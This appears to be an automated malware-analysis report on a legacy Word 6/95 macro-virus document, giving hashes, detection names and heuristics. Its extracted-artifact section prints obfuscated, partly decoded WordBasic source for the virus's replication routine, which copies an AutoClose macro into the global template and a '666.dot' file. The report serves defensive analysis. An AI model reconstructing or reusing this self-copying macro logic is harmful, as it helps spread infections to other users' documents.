Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 35192d9a3053b18f…

MALICIOUS

Office (OLE)

Size: 7.5 KB
First seen: 2012-06-14
MD5: 1879c3d773cc58b58600dbd2dec94780
SHA-1: b45d8f4f3592156ccd72d0e967b90f8c2232f555
SHA-256: 35192d9a3053b18f9f193f6e17ccc1a36eabd83528033697b40dddc923fb1a2e
Risk score: 102

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits legacy WordBasic macro-virus markers, specifically the string "RSN MACRO VIRUS", and is identified by ClamAV as Win.Trojan.Triple-1. Together, these markers and the ClamAV signature strongly suggest historical macro-based malware. The document body contains numerous obfuscated strings and references to macro functions such as AutoClose, further supporting macro-based execution.

Heuristics (3)

  • ClamAV: Win.Trojan.Triple-1 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Triple-1
  • Legacy WordBasic macro-virus markers [high] (OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source [info] (OLE_LEGACY_WORDBASIC_MACRO_SOURCE)
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so that its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: wordbasic_macros.txt
Kind: wordbasic-macro
Source: analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)
Size: 1860 bytes
SHA-256: 6642e68325f6cfc15b08e0b402e16817902c1f05d95a066787ae6ccfba23ef2f
Preview of the extracted script (first 1,000 lines):
26465
RTVLKGRJBMAUBETIJC
TKCIICTPDQQBBU
PJFMQNNSRLDRIVH
SUUSFDKFUIMVBOGOBM$
MAIN
, -
PJFMQNNSRLDRIVH = 8
TKCIICTPDQQBBU = 0
@cmd809e TKCIICTPDQQBBU
SUUSFDKFUIMVBOGOBM$ = @cmd818c PJFMQNNSRLDRIVH
RTVLKGRJBMAUBETIJC = 1
GUIUDGBAHGRGNIBQ RTVLKGRJBMAUBETIJC PTMJISGJPKGTVOIHRN
@cmd80c2 "Global:AutoClose" , "666:AutoClose"
@cmd00d7 = "AutoClose" , = RTVLKGRJBMAUBETIJC ,
@cmd80a3 RTVLKGRJBMAUBETIJC
@cmd8183 SUUSFDKFUIMVBOGOBM$ = "\666.dot" , TKCIICTPDQQBBU
dlg @cmd00d7
dlg
dlg
@cmd00d7 dlg
@cmd8183 SUUSFDKFUIMVBOGOBM$ = "\666.dot" , RTVLKGRJBMAUBETIJC
@cmd80c2 "666:AutoClose" , "Global:AutoClose"
@cmd80a3 RTVLKGRJBMAUBETIJC
@cmd809e RTVLKGRJBMAUBETIJC
PTMJISGJPKGTVOIHRN
, -
dlg @cmd00d7
dlg
dlg
@cmd00d7 dlg
@cmd809e RTVLKGRJBMAUBETIJC
@cmd8147 RTVLKGRJBMAUBETIJC
GUIUDGBAHGRGNIBQ
RKTPQESOJOTUK = TKCIICTPDQQBBU @cmd80b7 TKCIICTPDQQBBU
@cmd80b8 RKTPQESOJOTUK , TKCIICTPDQQBBU = "AutoClose" GUIUDGBAHGRGNIBQ = RTVLKGRJBMAUBETIJC
RKTPQESOJOTUK
REDUCKNJEFPMGI
VGFRTGMIJLNBFSEK
GTETPERLDAVIT
AEGLTKNENVLPTEFTQBA$
MAIN
, -
GTETPERLDAVIT = 0
VGFRTGMIJLNBFSEK = 8
@cmd809e GTETPERLDAVIT
AEGLTKNENVLPTEFTQBA$ = @cmd818c VGFRTGMIJLNBFSEK
REDUCKNJEFPMGI = 1
SNARRNTPUTCOFHGEO REDUCKNJEFPMGI DFCOCTENIMUNPGHQOKV
@cmd80c2 "Global:AutoClose" , "666:AutoClose"
@cmd00d7 = "AutoClose" , = REDUCKNJEFPMGI ,
@cmd80a3 REDUCKNJEFPMGI
@cmd8183 AEGLTKNENVLPTEFTQBA$ = "\666.dot" , GTETPERLDAVIT
dlg @cmd0057
dlg
dlg
@cmd0057 dlg
@cmd8183 AEGLTKNENVLPTEFTQBA$ = "\666.dot" , REDUCKNJEFPMGI
@cmd80c2 "666:AutoClose" , "Global:AutoClose"
@cmd80a3 REDUCKNJEFPMGI
@cmd809e REDUCKNJEFPMGI
DFCOCTENIMUNPGHQOKV
, -
dlg @cmd0057
dlg
dlg
@cmd0057 dlg
@cmd809e REDUCKNJEFPMGI
@cmd8147 REDUCKNJEFPMGI
SNARRNTPUTCOFHGEO
GQIDNJAQKKNFCRLTQAC = GTETPERLDAVIT @cmd80b7 GTETPERLDAVIT
@cmd80b8 GQIDNJAQKKNFCRLTQAC , GTETPERLDAVIT = "AutoClose" SNARRNTPUTCOFHGEO = REDUCKNJEFPMGI
GQIDNJAQKKNFCRLTQAC